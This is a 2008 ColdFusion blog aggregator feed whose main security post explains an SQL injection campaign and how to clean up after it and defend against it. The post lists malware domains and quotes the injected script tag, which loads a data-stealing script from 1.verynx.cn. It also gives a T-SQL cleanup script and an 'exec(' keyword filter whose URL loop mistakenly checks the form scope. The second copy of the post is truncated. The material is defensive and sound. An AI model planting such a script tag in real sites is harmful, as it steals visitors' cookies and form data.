coldfusionBloggers.org Feed

Annual Business Run

Gary Gilbert's Technology Blog — Thu, 24 Jul 2008 11:01:13 GMT

Today is the annual Munich business run(German). It's a "just for fun" run with a distance of just 6.75 KM. [More]

SQL Injection Attacks and How to protect yourself

Russ "Snake" Michaels — Thu, 24 Jul 2008 10:21:28 GMT

This week there has been an increase in SQL Injection attacks, specifically against ColdFusion sites since the hackers have discovered they are also vulnerable, primarily due to most developers not using <cfqueryparam>. You should also be aware that prior to the actual attacks, bots are first running vulnerability tests against sites to find out which language and which database they are using to determine which vulberability they may be vulberable to.

Use of cfqueryparam is pretty much a must have requirement for your queries these days and is generally secure because it results in a prepared statement, which is always binded as a string, which is not vulnerable to sql injection. But, many ColdFusion developers do not seem to use cfqueryparam either due to lack of experience or knowledge in securing their code or lack of knowledge of CFML and this tag. Of course prior to ColdFusion 6 this tag did not exist, so many old legal ColdFusion 5 or older applications are also vulnerable.

In mid-July, the hacker webzine 0x000000.com discussed potential pitfalls, particularly within older versions of ColdFusion, which could lend themselves to potential compromise:

~ Easily discoverable passwords
~ Lack of parameterized query handling
~ Failure to properly escape single quotes
~ Returning error messages that are too verbose

Like standard SQL injection, ColdFusion attacks have been around for years. What appears to have happened now appears to be the same thing that led to the millions of compromises in the ASP/SQL Server attacks - the use of automated tools.

Following are some of the malware domains involved in the recent ColdFusion attacks:

mh.976801.cn
1.verynx.cn
mm.ll80.com

Over at CFMX Hosting we have had quite a lot of customers hit by the verynx.cn attack, which inserts the following into your database tables.

</title><script src="http://1.verynx.cn/w.js"></script>

The resulting javascript which gets loaded into your pages is used to "phish" your visitors details by copying their cookies and other personal details from form fields. There are various incarnations of this attack now, resulting in different scripts being inserted into your database. If restoring a database backup is not an option for you, then the following little script may help you out.

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

This script will UNDO the changes made by the attack by searching for the afore mentioned string in all columns in all table in your database and removing it. All you need to do is modify the string to match the changes that were made to your database. If your site was attacked multiple times then the string may appear more than one, so you may have to run this script more than once.

Protecting Yourself

All of the attacks we have seen so far seem to be implemented by using the "Exec()" command, so are only affecting Microsoft SQL Server databases. So a quick and easy way to stop this is to add a URL and FORM scope validation script to your application.cfm or application.cfc to make sure none of these variables contain the Exec() command.

E.G.

<cfloop collection="#form#" item="item">
<cfif form[item] contains "exec(">
.. your decision code here ...
</cfif>
</cfloop>
<cfloop collection="#URL#" item="item">
<cfif form[item] contains "exec(">
.. your decision code here ...
</cfif>
</cfloop>

You could of course expand this further to check for any kind of SQL statement in the FORM or URL scope, as really there never should be any SQL in these scopes if your code is well written. Your decision code will determine what happens if a match is found. As it is obviously an attack there is no point in continuing to process the request and strip out the unwanted strings, so you may as well just abort it or generate an error page.

You should of course also be adding cfqueryparam tags to all your queries too, or if you are still running older version of CF then you should be validating the data types in another way, using <cfapram> or val() for example.

The best approach you can take is to lock down your database users with specific permissions so that your web site can only SELECT from the database and cannot update, delete, execute. You should ideally only allow these permissions from your backend admin system. If there are parts of your site that need to update the database, restrict the dbuser or DSN to only be able to update the specific tables/columns they need to.

If you need to find out which pages in your site have been attacked, then you should check your web logs, and search for things like "exec" or "declare" or other sql statements.

Six Months Of Epicenter Consulting

Kinky Solutions — Thu, 24 Jul 2008 10:21:18 GMT

This last week marks the sixth month anniversary of my time at Epicenter Consulting. For those of you who don't know, I left my position as CTO at Nylon Technology back in January to partner with Clark Valberg and create Epicenter Consulting . It was not an easy decision to make; I had been at Nylon for close to 5 years and had seen it grow from a 3 developer shop that he ... Read More »

A Simple OO Controller

Application Generation — Thu, 24 Jul 2008 10:01:01 GMT

Unless you have a pretty unique use case, if you want a MVC controller, you probably want to check out ColdBox, Model Glue, Mach-II or Fusebox. The community frameworks have put a lot of time into getting the little details right and are well architected, executed and tested. However, sometimes it's useful to see much simpler samples to understand how a simple MVC controller might work (without necessarily supporting implicit invocation). Ben had some problems with his OO controller, so I thought I'd post a very simple sample of the kind of approach I've been playing with . . . [More]

Presenting A MAX MegaLab

Ben Forta — Thu, 24 Jul 2008 10:01:01 GMT

We'll be debuting a new session format at MAX North America this year, the MegaLab. I'll be presenting one, a getting-started crash-course session on LiveCycle Data Services and BlazeDS entitled "Getting Started with LiveCycle Data Services" on Monday, November 17, 2:00 pm - 3:30 pm. I've posted details on the official MAX blog. This one is expected to sell out pretty quickly, so if you want to take part, sign up now!

SQL Injection Attacks and How to protect yourself

Russ "Snake" Michaels — Thu, 24 Jul 2008 09:21:31 GMT

In mid-July, the hacker webzine 0x000000.com discussed potential pitfalls, particularly within older versions of ColdFusion, which could lend themselves to potential compromise:

~ Easily discoverable passwords
~ Lack of parameterized query handling
~ Failure to properly escape single quotes
~ Returning error messages that are too verbose

Following are some of the malware domains involved in the recent ColdFusion attacks:

mh.976801.cn
1.verynx.cn
mm.ll80.com

Over at CFMX Hosting we have had quite a lot of customers hit by the verynx.cn attack, which inserts the following into your database tables.

</title><script src="http://1.verynx.cn/w.js"></script>

E.G.

You should of course also be adding cfqueryparam tags to all your queries, or if you are still running older version of CF then you should be validating the data types in another way, using <cfapram> or val() for example.

Got DNS? If so it looks like you have vulnerabilty too

john.lyons-den.org — Thu, 24 Jul 2008 09:21:17 GMT

seems a security company uncovered a bug in the way DNS works, similar in effect to poisoning DNS caching. Link to the article here

I Present Fun With ColdSpring to TACFUG Tonight

Dan Wilsons ColdFusion / Flex Blog — Thu, 24 Jul 2008 09:21:07 GMT

Just a friendly reminder, tonight I am giving a presentation on ColdSpring to the Best Darned ColdFusion User Group out there!

We'll cover installation, Dependency Injection, Factories, Configuration, Dynamic Properties, Complex DI Strategies and also look at some practical usage.

As usual, Pizza and refreshments for all. We're going to have a good time tonight.

More info on the July Meeting Page at TACFUG.org

Announcing the first ever International Operation cf_SQLprotect

Coder's Revolution — Thu, 24 Jul 2008 07:01:05 GMT

Hear Ye, Hear Ye! I hereby declare Friday, July 25th as the first ever International Operation cf_SQLprotect. In response to the massive amount of SQL injection attacks in the past few weeks I want the ColdFusion community to be doing our darndest to keep our applications safe from harm. This Friday, I want everyone who has a site big or small, well known or obscure, to join the world and scan their code base for vulnerable queries and fix them. [More]

Review: Mockups from Balsamiq

Daemonite: team daemon blog — Thu, 24 Jul 2008 06:41:05 GMT

Balsamiq's "Mockups" tool is ideal for throwing together the straw-man, discussion point, come... well mockup, for application development. It's the perfect "electronic napkin". Quick. Intuitive. And if you're a scribbler, doodler, or back of the envelope kinda guy then this is the perfect app.